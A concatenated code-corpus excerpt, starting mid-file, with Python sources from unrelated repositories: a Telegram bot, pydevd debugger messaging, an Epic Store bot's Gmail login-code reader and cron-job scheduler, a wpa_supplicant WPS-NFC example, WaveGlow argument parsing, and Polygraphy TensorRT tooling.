context.bot.delete_message(chat_id=db, message_id=msg.message_id)
return telegram.InlineQueryResultCachedPhoto(
id=str(uuid.uuid4()),
title="CachedPhoto",
photo_file_id=photo_id,
)
```
#### File: cotd-telegram-bot/cotd/service.py
```python
import argparse
import logging
import typing
from dataclasses import dataclass
import telegram
import telegram.ext
import cotd.storage
@dataclass
class Options(argparse.Namespace):
log_level: str
version: str
group: int
mode: str
db: int
@dataclass
class Flags(argparse.Namespace):
feature_enable_security: bool
feature_enable_persistence: bool
@dataclass
class EnvConfig:
token: str
@dataclass
class TGBotMetadata:
user: telegram.User
@dataclass
class COTDBotStickers:
sticker_set: telegram.StickerSet
sticker_set_file_ids: typing.List[str]
@dataclass
class HandlerGroup:
group_index: int
handlers: typing.List[telegram.ext.Handler]
@dataclass
class TGBotConfig:
updater: telegram.ext.Updater
options: Options
persistence: telegram.ext.DictPersistence
metadata: TGBotMetadata
handlers: typing.List[HandlerGroup]
commands: typing.List[telegram.BotCommand]
@dataclass
class COTDBotConfig:
features: Flags
logger: logging.Logger
class TGBotClient:
def __init__(self, config: TGBotConfig):
self.options = config.options
self.updater = config.updater
self.metadata = config.metadata
self.commands = config.commands
self.handlers = config.handlers
self.persistence = config.persistence
def set_dispatcher_handlers(self) -> None:
for handler_group in self.handlers:
for handler in handler_group.handlers:
self.updater.dispatcher.add_handler(handler, group=handler_group.group_index)
def set_commands(self) -> None:
self.updater.bot.set_my_commands(self.commands)
def run(self) -> None:
self.updater.start_polling()
self.updater.idle()
def set_secure_sources(self) -> None:
self.updater.dispatcher._cotd_db = self.options.db
self.updater.dispatcher._cotd_group = self.options.group
def initialize(self) -> None:
self.set_secure_sources()
self.set_dispatcher_handlers()
self.set_commands()
class COTDBotService:
def __init__(self, client: TGBotClient, config: COTDBotConfig):
self.client = client
self.logger = config.logger
self.features = config.features
def get_stickers(self) -> COTDBotStickers:
fileids = []
if not (sticker_pack := self._fetch_sticker_set()):
self._init_sticker_set()
sticker_pack = self._fetch_sticker_set()
return COTDBotStickers(
**{
"sticker_set": sticker_pack,
"sticker_set_file_ids": fileids.extend(
list(sticker.file_id for sticker in sticker_pack.stickers)
),
}
)
def _init_sticker_set(self) -> bool:
return self.client.updater.bot.create_new_sticker_set(
png_sticker=open("static/smileyOne512x512.png", "rb"),
name=f"VC_by_{self.client.metadata.user.username}",
title=f"VC_by_{self.client.metadata.user.username}",
user_id=int(145043750),
emojis="🙂😊",
)
def _fetch_sticker_set(self) -> telegram.StickerSet:
try:
return self.client.updater.bot.get_sticker_set(
f"VC_by_{self.client.metadata.user.username}"
)
except telegram.error.BadRequest as err:
raise err
@property
def stickers(self):
return self.get_stickers()
def factory(
envs: EnvConfig,
features: Flags,
options: Options,
client_logger: logging.Logger,
cotd_logger: logging.Logger,
commands: typing.List[telegram.BotCommand],
handlers: typing.List[HandlerGroup],
storage: cotd.storage.TelegramSavedMessagesStorage,
) -> COTDBotService:
storage: cotd.storage.TelegramSavedMessagesStorage | cotd.storage.TelegramSavedMessagesStorageDev = (
storage
if features.feature_enable_persistence
else cotd.storage.TelegramSavedMessagesStorageDev(options.db)
)
bot = telegram.ext.ExtBot(
token=envs.token,
defaults=telegram.ext.Defaults(
parse_mode="HTML",
disable_notification=True,
disable_web_page_preview=True,
timeout=5.0,
),
)
updater = telegram.ext.Updater(
bot=bot,
use_context=True,
persistence=storage,
workers=1,
)
updater.logger = client_logger
updater.dispatcher.logger = client_logger
metadata = TGBotMetadata(updater.bot.get_me())
tg_bot_client = TGBotClient(
TGBotConfig(
updater=updater,
options=options,
metadata=metadata,
handlers=handlers,
commands=commands,
persistence=storage,
)
)
return COTDBotService(
tg_bot_client, config=COTDBotConfig(features=features, logger=cotd_logger)
)
``` |
{
"source": "5h4d0wb0y/dotfiles",
"score": 2
} |
#### File: pydevd/_pydevd_bundle/pydevd_net_command_factory_json.py
```python
import os
from _pydev_bundle._pydev_imports_tipper import TYPE_IMPORT, TYPE_CLASS, TYPE_FUNCTION, TYPE_ATTR, \
TYPE_BUILTIN, TYPE_PARAM
from _pydev_bundle.pydev_is_thread_alive import is_thread_alive
from _pydev_bundle.pydev_override import overrides
from _pydevd_bundle._debug_adapter import pydevd_schema
from _pydevd_bundle.pydevd_comm_constants import CMD_THREAD_CREATE, CMD_RETURN, CMD_MODULE_EVENT, \
CMD_WRITE_TO_CONSOLE
from _pydevd_bundle.pydevd_constants import get_thread_id, dict_values
from _pydevd_bundle.pydevd_net_command import NetCommand
from _pydevd_bundle.pydevd_net_command_factory_xml import NetCommandFactory
from _pydevd_bundle.pydevd_utils import get_non_pydevd_threads
from _pydev_imps._pydev_saved_modules import threading
from _pydevd_bundle._debug_adapter.pydevd_schema import ModuleEvent, ModuleEventBody, Module, \
OutputEventBody, OutputEvent
from functools import partial
import itertools
import pydevd_file_utils
class ModulesManager(object):
def __init__(self):
self._lock = threading.Lock()
self._modules = {}
self._next_id = partial(next, itertools.count(0))
def track_module(self, filename_in_utf8, module_name, frame):
'''
:return list(NetCommand):
Returns a list with the module events to be sent.
'''
if filename_in_utf8 in self._modules:
return []
module_events = []
with self._lock:
# Must check again after getting the lock.
if filename_in_utf8 in self._modules:
return
version = frame.f_globals.get('__version__', '')
package_name = frame.f_globals.get('__package__', '')
module_id = self._next_id()
module = Module(module_id, module_name, filename_in_utf8)
if version:
module.version = version
if package_name:
# Note: package doesn't appear in the docs but seems to be expected?
module.kwargs['package'] = package_name
module_event = ModuleEvent(ModuleEventBody('new', module))
module_events.append(NetCommand(CMD_MODULE_EVENT, 0, module_event, is_json=True))
self._modules[filename_in_utf8] = module.to_dict()
return module_events
def get_modules_info(self):
'''
:return list(Module)
'''
with self._lock:
return dict_values(self._modules)
class NetCommandFactoryJson(NetCommandFactory):
'''
Factory for commands which will provide messages as json (they should be
similar to the debug adapter where possible, although some differences
are currently Ok).
Note that it currently overrides the xml version so that messages
can be done one at a time (any message not overridden will currently
use the xml version) -- after having all messages handled, it should
no longer use NetCommandFactory as the base class.
'''
def __init__(self):
NetCommandFactory.__init__(self)
self.modules_manager = ModulesManager()
@overrides(NetCommandFactory.make_thread_created_message)
def make_thread_created_message(self, thread):
# Note: the thread id for the debug adapter must be an int
# (make the actual id from get_thread_id respect that later on).
msg = pydevd_schema.ThreadEvent(
pydevd_schema.ThreadEventBody('started', get_thread_id(thread)),
)
return NetCommand(CMD_THREAD_CREATE, 0, msg, is_json=True)
@overrides(NetCommandFactory.make_list_threads_message)
def make_list_threads_message(self, seq):
threads = []
for thread in get_non_pydevd_threads():
if is_thread_alive(thread):
thread_schema = pydevd_schema.Thread(id=get_thread_id(thread), name=thread.getName())
threads.append(thread_schema.to_dict())
body = pydevd_schema.ThreadsResponseBody(threads)
response = pydevd_schema.ThreadsResponse(
request_seq=seq, success=True, command='threads', body=body)
return NetCommand(CMD_RETURN, 0, response, is_json=True)
@overrides(NetCommandFactory.make_get_completions_message)
def make_get_completions_message(self, seq, completions, qualifier, start):
COMPLETION_TYPE_LOOK_UP = {
TYPE_IMPORT: pydevd_schema.CompletionItemType.MODULE,
TYPE_CLASS: pydevd_schema.CompletionItemType.CLASS,
TYPE_FUNCTION: pydevd_schema.CompletionItemType.FUNCTION,
TYPE_ATTR: pydevd_schema.CompletionItemType.FIELD,
TYPE_BUILTIN: pydevd_schema.CompletionItemType.KEYWORD,
TYPE_PARAM: pydevd_schema.CompletionItemType.VARIABLE,
}
qualifier = qualifier.lower()
qualifier_len = len(qualifier)
targets = []
for completion in completions:
label = completion[0]
if label.lower().startswith(qualifier):
completion = pydevd_schema.CompletionItem(
label=label, type=COMPLETION_TYPE_LOOK_UP[completion[3]], start=start, length=qualifier_len)
targets.append(completion.to_dict())
body = pydevd_schema.CompletionsResponseBody(targets)
response = pydevd_schema.CompletionsResponse(
request_seq=seq, success=True, command='completions', body=body)
return NetCommand(CMD_RETURN, 0, response, is_json=True)
def _format_frame_name(self, fmt, initial_name, module_name, line, path):
if fmt is None:
return initial_name
frame_name = initial_name
if fmt.get('module', False):
if module_name:
if initial_name == '<module>':
frame_name = module_name
else:
frame_name = '%s.%s' % (module_name, initial_name)
else:
basename = os.path.basename(path)
basename = basename[0:-3] if basename.lower().endswith('.py') else basename
if initial_name == '<module>':
frame_name = '%s in %s' % (initial_name, basename)
else:
frame_name = '%s.%s' % (basename, initial_name)
if fmt.get('line', False):
frame_name = '%s : %d' % (frame_name, line)
return frame_name
@overrides(NetCommandFactory.make_get_thread_stack_message)
def make_get_thread_stack_message(self, py_db, seq, thread_id, topmost_frame, fmt, must_be_suspended=False):
frames = []
module_events = []
if topmost_frame is not None:
frame_id_to_lineno = {}
try:
# : :type suspended_frames_manager: SuspendedFramesManager
suspended_frames_manager = py_db.suspended_frames_manager
info = suspended_frames_manager.get_topmost_frame_and_frame_id_to_line(thread_id)
if info is None:
# Could not find stack of suspended frame...
if must_be_suspended:
return None
else:
# Note: we have to use the topmost frame where it was suspended (it may
# be different if it was an exception).
topmost_frame, frame_id_to_lineno = info
for frame_id, frame, method_name, filename_in_utf8, lineno in self._iter_visible_frames_info(
py_db, topmost_frame, frame_id_to_lineno
):
module_name = frame.f_globals.get('__name__', '')
module_events.extend(self.modules_manager.track_module(filename_in_utf8, module_name, frame))
presentation_hint = None
if not getattr(frame, 'IS_PLUGIN_FRAME', False): # Never filter out plugin frames!
if not py_db.in_project_scope(filename_in_utf8):
if py_db.get_use_libraries_filter():
continue
presentation_hint = 'subtle'
formatted_name = self._format_frame_name(fmt, method_name, module_name, lineno, filename_in_utf8)
frames.append(pydevd_schema.StackFrame(
frame_id, formatted_name, lineno, column=1, source={
'path': filename_in_utf8,
'sourceReference': pydevd_file_utils.get_client_filename_source_reference(filename_in_utf8),
},
presentationHint=presentation_hint).to_dict())
finally:
topmost_frame = None
for module_event in module_events:
py_db.writer.add_command(module_event)
response = pydevd_schema.StackTraceResponse(
request_seq=seq,
success=True,
command='stackTrace',
body=pydevd_schema.StackTraceResponseBody(stackFrames=frames, totalFrames=len(frames)))
return NetCommand(CMD_RETURN, 0, response, is_json=True)
@overrides(NetCommandFactory.make_io_message)
def make_io_message(self, v, ctx):
category = 'stdout' if int(ctx) == 1 else 'stderr'
body = OutputEventBody(v, category)
event = OutputEvent(body)
return NetCommand(CMD_WRITE_TO_CONSOLE, 0, event, is_json=True)
``` |
{
"source": "5H4D0W-C0D3R/epic_store_bot",
"score": 3
} |
#### File: epic_store_bot/lib/authCode.py
```python
import smtplib
import imaplib
import time
import email
import re
from .config import Config
config = Config()
class Getmail:
def __init__(self):
time.sleep(60)
self.FROM_EMAIL = config['gmail']['email']
self.FROM_PWD = config['gmail']['app_password']
self.SMTP_SERVER = "imap.gmail.com"
self.SMTP_PORT = 993
self.COND = [
['"Facebook" <<EMAIL>>', 'Your Facebook Security Code'],
['Microsoft account team <<EMAIL>>', 'Microsoft account security code']
]
def send_mails(self):
pass
def get_mails(self, s):
try:
mail = imaplib.IMAP4_SSL(self.SMTP_SERVER)
mail.login(self.FROM_EMAIL,self.FROM_PWD)
mail.select('inbox')
type, data = mail.search(None, 'ALL')
mail_ids = data[0]
id_list = mail_ids.split()
first_email_id = int(id_list[0])
latest_email_id = int(id_list[-1])
for i in range(latest_email_id,first_email_id, -1):
typ, data = mail.fetch(str(i), "(RFC822)" )
for response_part in data:
if isinstance(response_part, tuple):
msg = email.message_from_bytes(response_part[1])
if msg['From'] == self.COND[s][0] and msg['subject'] == self.COND[s][1]:
if msg.is_multipart():
for part in msg.walk():
try:
if part.get_content_type() == "text/html":
hmsg = part.get_payload(decode=True).decode()
except Exception as error:
print(error)
email_subject = msg['subject']
email_from = msg['from']
print('From : ' + email_from + '\n')
print('Subject : ' + email_subject + '\n')
return str(re.findall(r">\d+<", hmsg)[0].strip("><"))
except Exception as e:
print(str(e))
def get_code(self, meth):
if meth == "facebook":
code = self.get_mails(0)
elif meth == "xbox":
code = self.get_mails(1)
return str(code)
```
#### File: epic_store_bot/lib/cronJob.py
```python
import requests
import re
from .config import Config
from .pgdb import Dtabase as db
config = Config()
class CronJob:
def __init__(self):
t = db().get_dta('bot_config')
h, m = divmod((t['hour'] * 60 + t['minute']) - 5, 60)
session = requests.session()
data = {
"login": {
"action": "login",
"email": config['cronjob']['email'],
"pw": config['cronjob']['password']
},
"add": {
"action": "add",
"title": config['cronjob']['yourappname'],
"url": "http://" + str(config['cronjob']['yourappname']) + ".herokuapp.com/",
"exec_mode": "day_time",
"day_time_hour": h,
"day_time_minute": m,
"notify_disable": "on"
},
"edit": {
"action": "save",
"title": config['cronjob']['yourappname'],
"url": "http://" + str(config['cronjob']['yourappname']) + ".herokuapp.com/",
"exec_mode": "day_time",
"day_time_hour": h,
"day_time_minute": m,
"timezone": t['timezone'],
"enabled": "on",
"notify_disable": "on"
}
}
session.post("https://cron-job.org/en/members/", data=data['login'])
self.session = session
self.data = data
def add(self):
self.session.post("https://cron-job.org/en/members/jobs/add/", data=self.data['add'])
def update(self):
res = self.session.post("https://cron-job.org/en/members/jobs/")
if "You did not create a cronjob yet" in res.text:
self.add()
else:
jobid = re.findall(r"jobid=\d*", res.text)[0].strip('jobid=')
print(jobid)
self.session.post("https://cron-job.org/en/members/jobs/edit/?jobid={}".format(jobid), data=self.data['edit'])
self.session.cookies.clear()
requests.delete("https://api.heroku.com/apps/epicbot488599/dynos/clock", headers={ "Accept": "application/vnd.heroku+json; version=3", "Authorization": "Bearer {}".format(config['cronjob']['api_token'])})
``` |
{
"source": "5ha5hank/wpa_supplicant",
"score": 2
} |
#### File: wpa_supplicant/examples/wps-nfc.py
```python
import os
import sys
import time
import nfc
import nfc.ndef
import nfc.llcp
import nfc.handover
import wpactrl
wpas_ctrl = '/var/run/wpa_supplicant'
def wpas_connect():
ifaces = []
if os.path.isdir(wpas_ctrl):
try:
ifaces = [os.path.join(wpas_ctrl, i) for i in os.listdir(wpas_ctrl)]
except OSError, error:
print "Could not find wpa_supplicant: ", error
return None
if len(ifaces) < 1:
print "No wpa_supplicant control interface found"
return None
for ctrl in ifaces:
try:
wpas = wpactrl.WPACtrl(ctrl)
return wpas
except wpactrl.error, error:
print "Error: ", error
pass
return None
def wpas_tag_read(message):
wpas = wpas_connect()
if (wpas == None):
return
print wpas.request("WPS_NFC_TAG_READ " + message.encode("hex"))
def wpas_get_handover_req():
wpas = wpas_connect()
if (wpas == None):
return None
return wpas.request("NFC_GET_HANDOVER_REQ NDEF WPS").rstrip().decode("hex")
def wpas_put_handover_sel(message):
wpas = wpas_connect()
if (wpas == None):
return
print wpas.request("NFC_RX_HANDOVER_SEL " + str(message).encode("hex"))
def wps_handover_init(peer):
print "Trying to initiate WPS handover"
data = wpas_get_handover_req()
if (data == None):
print "Could not get handover request message from wpa_supplicant"
return
print "Handover request from wpa_supplicant: " + data.encode("hex")
message = nfc.ndef.Message(data)
print "Parsed handover request: " + message.pretty()
nfc.llcp.activate(peer);
time.sleep(0.5)
client = nfc.handover.HandoverClient()
try:
print "Trying handover";
client.connect()
print "Connected for handover"
except nfc.llcp.ConnectRefused:
print "Handover connection refused"
nfc.llcp.shutdown()
client.close()
return
print "Sending handover request"
if not client.send(message):
print "Failed to send handover request"
print "Receiving handover response"
message = client._recv()
print "Handover select received"
print message.pretty()
wpas_put_handover_sel(message)
print "Remove peer"
nfc.llcp.shutdown()
client.close()
print "Done with handover"
def wps_tag_read(tag):
if len(tag.ndef.message):
message = nfc.ndef.Message(tag.ndef.message)
print "message type " + message.type
for record in message:
print "record type " + record.type
if record.type == "application/vnd.wfa.wsc":
print "WPS tag - send to wpa_supplicant"
wpas_tag_read(tag.ndef.message)
break
else:
print "Empty tag"
print "Remove tag"
while tag.is_present:
time.sleep(0.1)
def main():
clf = nfc.ContactlessFrontend()
try:
while True:
print "Waiting for a tag or peer to be touched"
while True:
general_bytes = nfc.llcp.startup({})
tag = clf.poll(general_bytes)
if tag == None:
continue
if isinstance(tag, nfc.DEP):
wps_handover_init(tag)
break
if tag.ndef:
wps_tag_read(tag)
break
if tag:
print "Not an NDEF tag - remove tag"
while tag.is_present:
time.sleep(0.1)
break
except KeyboardInterrupt:
raise SystemExit
finally:
clf.close()
raise SystemExit
if __name__ == '__main__':
main()
``` |
{
"source": "5had3z/TensorRT",
"score": 2
} |
#### File: Tacotron2/waveglow/arg_parser.py
```python
import argparse
def parse_waveglow_args(parent, add_help=False):
"""
Parse commandline arguments.
"""
parser = argparse.ArgumentParser(parents=[parent], add_help=add_help)
# misc parameters
parser.add_argument('--n-mel-channels', default=80, type=int,
help='Number of bins in mel-spectrograms')
# glow parameters
parser.add_argument('--flows', default=12, type=int,
help='Number of steps of flow')
parser.add_argument('--groups', default=8, type=int,
help='Number of samples in a group processed by the steps of flow')
parser.add_argument('--early-every', default=4, type=int,
help='Determines how often (i.e., after how many coupling layers) \
a number of channels (defined by --early-size parameter) are output\
to the loss function')
parser.add_argument('--early-size', default=2, type=int,
help='Number of channels output to the loss function')
parser.add_argument('--sigma', default=1.0, type=float,
help='Standard deviation used for sampling from Gaussian')
parser.add_argument('--segment-length', default=4000, type=int,
help='Segment length (audio samples) processed per iteration')
# wavenet parameters
wavenet = parser.add_argument_group('WaveNet parameters')
wavenet.add_argument('--wn-kernel-size', default=3, type=int,
help='Kernel size for dialted convolution in the affine coupling layer (WN)')
wavenet.add_argument('--wn-channels', default=512, type=int,
help='Number of channels in WN')
wavenet.add_argument('--wn-layers', default=8, type=int,
help='Number of layers in WN')
return parser
```
#### File: backend/trt/calibrator.py
```python
import contextlib
import os
from collections import OrderedDict
import tensorrt as trt
from polygraphy.logger.logger import G_LOGGER, LogMode
from polygraphy.util import misc
from polygraphy.util.cuda import DeviceBuffer
def Calibrator(data_loader, cache=None, BaseClass=trt.IInt8MinMaxCalibrator,
batch_size=None):
"""
Supplies calibration data to TensorRT to calibrate the network for INT8 inference.
Args:
data_loader (Generator -> OrderedDict[str, np.ndarray]):
A generator or iterable that yields a dictionary that maps input names to input NumPy buffers.
In case you don't know details about the inputs ahead of time, you can access the
`input_metadata` property in your data loader, which will be set to an `TensorMetadata` instance.
Note that this does not work for generators or lists.
The number of calibration batches is controlled by the number of items supplied
by the data loader.
cache (Union[str, file-like]):
Path or file-like object to save/load the calibration cache.
By default, the calibration cache is not saved.
BaseClass (type):
The type of calibrator to inherit from.
Defaults to trt.IInt8MinMaxCalibrator.
batch_size (int):
[DEPRECATED] The size of each batch provided by the data loader.
"""
class CalibratorClass(BaseClass):
"""
Calibrator that supplies calibration data to TensorRT to calibrate the network for INT8 inference.
"""
def __init__(self):
# Must explicitly initialize parent for any trampoline class! Will mysteriously segfault without this.
BaseClass.__init__(self)
self.data_loader = data_loader
self._cache = cache
self.device_buffers = OrderedDict()
self.reset()
G_LOGGER.verbose("Created calibrator [cache={:}]".format(self._cache))
self.batch_size = misc.default_value(batch_size, 1)
def reset(self, input_metadata=None):
"""
Reset this calibrator for reuse.
The calibrator will clear any dynamic ranges cached from previous calibration runs, and will
attempt to rewind the data loader (note that generators cannot be rewound).
Args:
input_metadata (TensorMetadata):
Mapping of input names to their data types and shapes.
Passed along to the data loader if provided. Generally should not be required
unless using Polygraphy's included `DataLoader` for this calibrator.
"""
if input_metadata is not None:
with contextlib.suppress(AttributeError):
self.data_loader.input_metadata = input_metadata
# Attempt to reset data loader
self.data_loader_iter = iter(self.data_loader)
self.num_batches = 0
# Make sure calibrator will check the cache again when reset.
self.cache_contents = None
self.has_cached_scales = False
def get_batch_size(self):
return self.batch_size
def get_batch(self, names):
try:
host_buffers = next(self.data_loader_iter)
except StopIteration:
if not self.num_batches:
G_LOGGER.warning("Calibrator data loader provided no data. Possibilities include: (1) data loader "
"has no data to provide, (2) data loader was a generator, and the calibrator is being "
"reused across multiple loaders (generators cannot be rewound)")
return None
else:
self.num_batches += 1
for name, host_buffer in host_buffers.items():
if name not in self.device_buffers:
self.device_buffers[name] = DeviceBuffer(shape=host_buffer.shape, dtype=host_buffer.dtype)
G_LOGGER.verbose("Allocated: {:}".format(self.device_buffers[name]))
if self.num_batches > 1:
G_LOGGER.warning("The calibrator data loader provided an extra input ({:}) compared to the last set of inputs.\n"
"Should this input be removed, or did you accidentally omit an input before?".format(name))
device_buffer = self.device_buffers[name]
device_buffer.copy_from(host_buffer)
return [device_buffer.address() for device_buffer in self.device_buffers.values()]
def read_calibration_cache(self):
def load_from_cache():
if self._cache is None:
return None
try:
if self._cache.seekable():
self._cache.seek(0)
return self._cache.read()
except AttributeError:
if os.path.exists(self._cache):
G_LOGGER.info("Reading calibration cache from: {:}".format(self._cache), mode=LogMode.ONCE)
with open(self._cache, "rb") as f:
return f.read()
except:
# Cache is not readable
return None
if not self.has_cached_scales:
self.cache_contents = load_from_cache()
if not self.cache_contents:
G_LOGGER.warning("Calibration cache was provided, but is empty. Will regenerate scales by running calibration.", mode=LogMode.ONCE)
self.cache_contents = None
else:
self.has_cached_scales = True
return self.cache_contents
def write_calibration_cache(self, cache):
self.cache_contents = cache.tobytes()
self.has_cached_scales = True
if self._cache is None:
return
try:
if self._cache.seekable():
self._cache.seek(0)
bytes_written = self._cache.write(self.cache_contents)
if bytes_written != len(self.cache_contents):
G_LOGGER.warning("Could not write entire cache. Note: cache contains {:} bytes, but only "
"{:} bytes were written".format(len(self.cache_contents), bytes_written))
except AttributeError:
G_LOGGER.info("Writing calibration cache to: {:}".format(self._cache))
with open(self._cache, "wb") as f:
f.write(self.cache_contents)
except:
# Cache is not writable
return
else:
self._cache.flush()
def free(self):
"""
Free the device buffers allocated for this calibrator.
"""
for device_buffer in self.device_buffers.values():
device_buffer.free()
return CalibratorClass()
```
#### File: polygraphy/common/struct.py
```python
from collections import OrderedDict, namedtuple
import numpy as np
MetadataTuple = namedtuple("MetadataTuple", ["dtype", "shape"]) # Metadata for single tensor
class TensorMetadata(OrderedDict):
"""
An OrderedDict[str, Tuple[np.dtype, Tuple[int]]] that maps input names to their data types and shapes.
"""
def add(self, name, dtype, shape):
"""
Convenience function for adding entries.
Args:
name (str): The name of the input.
dtype (np.dtype): The data type of the input.
shape (Tuple[int]):
The shape of the input. Dynamic dimensions may
be indicated by negative values, ``None``, or a string.
Returns:
The newly added entry.
"""
self[name] = MetadataTuple(dtype, shape)
return self
def __repr__(self):
ret = "TensorMetadata()"
for name, (dtype, shape) in self.items():
ret += ".add('{:}', {:}, {:})".format(name, dtype, shape)
return ret
def __str__(self):
def str_from_single_meta(name, dtype, shape):
ret = "{:}".format(name)
meta_items = []
if dtype is not None:
meta_items.append("dtype={:}".format(np.dtype(dtype).name))
if shape is not None:
meta_items.append("shape={:}".format(tuple(shape)))
if meta_items:
ret += " [" + ", ".join(meta_items) + "]"
return ret
sep = ", "
elems = [str_from_single_meta(name, dtype, shape) for name, (dtype, shape) in self.items()]
return "{" + sep.join(elems) + "}"
```
#### File: polygraphy/comparator/postprocess.py
```python
import numpy as np
from polygraphy.util import misc
class PostprocessFunc(object):
"""
Provides functions that can apply post-processing to `IterationResult` s.
"""
@staticmethod
# This function returns a top_k function that can be used as a postprocess_func.
def topk_func(k=10, axis=-1, outputs=None, exclude=None):
"""
Creates a function that applies a Top-K operation to a IterationResult.
Top-K will return the indices of the k largest values in the array.
Args:
k (int):
The number of indices to keep.
If this exceeds the axis length, it will be clamped.
Defaults to 10.
axis (int):
The axis along which to apply the topk.
Defaults to -1.
outputs (Sequence[str]):
Names of outputs to apply top-k to.
Defaults to all outputs.
exclude (Sequence[str]):
Names of outputs to exclude. Top-K will not be applied to these outputs.
Returns:
Callable(IterationResult) -> IterationResult: The top-k function.
"""
exclude = set(misc.default_value(exclude, []))
# Top-K implementation.
def topk(run_result):
nonlocal outputs
outputs = set(misc.default_value(outputs, run_result.keys()))
for name, output in run_result.items():
if name in outputs and name not in exclude:
indices = np.argsort(-output, axis=axis)
axis_len = indices.shape[axis]
run_result[name] = np.take(indices, np.arange(0, min(k, axis_len)), axis=axis)
return run_result
return topk
```
#### File: tools/surgeon/surgeon.py
```python
import json
from collections import OrderedDict
import onnx
import onnx_graphsurgeon as gs
from polygraphy.common import TensorMetadata, constants
from polygraphy.logger import G_LOGGER
from polygraphy.tools.base import Tool
from polygraphy.tools.util import args as args_util
from polygraphy.tools.util import misc as tool_util
from polygraphy.util import misc
# Weights should be stored separately, JSON can just have a reference to a key.
class Config(OrderedDict):
@staticmethod
def from_graph(graph):
def names_from_tensors(tensors):
return [tensor.name for tensor in tensors]
def meta_from_tensors(tensors):
meta = []
for tensor in tensors:
tensor_meta = {"name": tensor.name}
if tensor.dtype:
tensor_meta["dtype"] = misc.STR_FROM_NP_TYPE[tensor.dtype]
if tensor.shape:
tensor_meta["shape"] = tensor.shape
meta.append(tensor_meta)
return meta
config = Config()
config["graph_inputs"] = meta_from_tensors(graph.inputs)
config["graph_outputs"] = meta_from_tensors(graph.outputs)
config["nodes"] = []
for node_id, node in enumerate(graph.nodes):
node_info = {
"id": node_id,
"name": node.name,
"op": node.op,
"inputs": names_from_tensors(node.inputs),
"outputs": names_from_tensors(node.outputs),
}
config["nodes"].append(node_info)
return config
################################# SUBTOOLS #################################
class STSurgeonBase(Tool):
def add_parser_args(self, parser, gs=False, inputs=False, shape_inference_default=None, data=False):
if gs:
parser.add_argument("--no-cleanup", help="Skip cleanup and keep unused nodes in the graph", action="store_true")
parser.add_argument("--no-toposort", help="Skip topologically sorting the graph", action="store_true")
args_util.add_model_args(parser, model_required=True, inputs=inputs)
args_util.add_onnx_args(parser, write=False, outputs=False, shape_inference_default=shape_inference_default)
args_util.add_tf_onnx_args(parser)
if data:
args_util.add_dataloader_args(parser)
def setup(self, args):
onnx_model = tool_util.get_onnx_model_loader(args)()
return gs.import_onnx(onnx_model)
class STExtract(STSurgeonBase):
"""
Extract a subgraph based on the specified inputs and outputs.
"""
def __init__(self):
self.name = "extract"
def add_parser_args(self, parser):
parser.add_argument("-o", "--output", required=True, help="Path at which to write the ONNX model including only the subgraph")
parser.add_argument("--inputs", dest="input_meta", help="Input metadata for subgraph (names, shapes, and data types). "
"Use 'auto' to make `extract` determine these automatically. Format: "
"--inputs <name>,<shape>,<dtype>. "
"For example: --inputs input0,1x3x224x224,float32 input1,auto,auto. "
"If omitted, uses the current model inputs. Supported data types are: {:}".format(list(misc.NP_TYPE_FROM_STR.keys())),
nargs="+", default=None)
parser.add_argument("--outputs", dest="output_meta", help="Output metadata for subgraph (names and data types). "
"Use 'auto' to make `extract` determine these automatically. Format: "
"--outputs <name>,<dtype>. "
"For example: --outputs output0:float32 output1:auto. "
"If omitted, uses the current model outputs. Supported data types are: {:}".format(list(misc.NP_TYPE_FROM_STR.keys())),
nargs="+", default=None)
super().add_parser_args(parser, gs=True, inputs="--model-inputs", shape_inference_default=True, data=True)
def __call__(self, args):
def missing_meta_tensors(input_metadata, output_metadata):
names = []
for name, (dtype, shape) in input_metadata.items():
if dtype is None or not shape:
names.append(name)
for name, (dtype, shape) in output_metadata.items():
if dtype is None:
names.append(name)
return names
def update_meta_from_tensor_map(meta, tensor_map):
for name, (dtype, shape) in meta.items():
tensor = tensor_map[name]
meta[name] = (dtype or tensor.dtype, shape or tensor.shape)
return meta
def meta_from_tensors(tensors):
meta = TensorMetadata()
for tensor in tensors:
meta.add(tensor.name, tensor.dtype, tensor.shape)
return meta
onnx_model = tool_util.get_onnx_model_loader(args)()
graph = gs.import_onnx(onnx_model)
tensor_map = graph.tensors()
if args.input_meta:
input_metadata = update_meta_from_tensor_map(args_util.parse_meta(args.input_meta), tensor_map)
else:
input_metadata = meta_from_tensors(graph.inputs)
if args.output_meta:
output_metadata = update_meta_from_tensor_map(args_util.parse_meta(args.output_meta, includes_shape=False), tensor_map)
else:
output_metadata = meta_from_tensors(graph.outputs)
missing_tensors = missing_meta_tensors(input_metadata, output_metadata)
if missing_tensors:
# Use ONNX runtime with static shapes to infer shapes when all else fails
# Returns a TensorMetadata for all tensors in the graph.
def fallback_shape_inference(onnx_model):
from polygraphy.backend.onnx import BytesFromOnnx, ModifyOnnx
from polygraphy.backend.onnxrt import (OnnxrtRunner,
SessionFromOnnxBytes)
load_model = ModifyOnnx(onnx_model, outputs=constants.MARK_ALL)
with OnnxrtRunner(SessionFromOnnxBytes(BytesFromOnnx(load_model))) as runner:
data_loader = tool_util.get_data_loader(args)
data_loader.input_metadata = runner.get_input_metadata()
outputs = runner.infer(feed_dict=data_loader[0])
meta = TensorMetadata()
for name, output in outputs.items():
meta.add(name, output.dtype, output.shape)
return meta
def update_meta_from_meta(meta, golden_meta):
for name, (dtype, shape) in meta.items():
if name in golden_meta:
(golden_dtype, golden_shape) = golden_meta[name]
meta[name] = (dtype or golden_dtype, shape or golden_shape)
G_LOGGER.verbose("Updated tensor: {:} metadata to: {:}".format(name, meta[name]))
return meta
G_LOGGER.warning("Some tensor shapes or dtypes are missing in the model. Note: Missing Tensors: {:}. "
"\nWill run inference to determine shapes. This will cause dynamic "
"dimensions to become static.\nTo avoid this, please provide metadata on the command-line. "
.format(missing_tensors))
golden_meta = fallback_shape_inference(onnx_model)
input_metadata = update_meta_from_meta(input_metadata, golden_meta)
output_metadata = update_meta_from_meta(output_metadata, golden_meta)
# Set the graph inputs and outputs
graph.inputs.clear()
for name, (dtype, shape) in input_metadata.items():
tensor = tensor_map[name]
tensor.dtype, tensor.shape = dtype, shape
tensor.inputs.clear()
graph.inputs.append(tensor)
graph.outputs.clear()
for name, (dtype, shape) in output_metadata.items():
tensor = tensor_map[name]
tensor.dtype, tensor.shape = dtype, shape
graph.outputs.append(tensor)
G_LOGGER.info("Using Graph Inputs:\n{:}{:}".format(constants.TAB, graph.inputs))
G_LOGGER.info("Using Graph Outputs:\n{:}{:}".format(constants.TAB, graph.outputs))
if not args.no_cleanup:
graph.cleanup()
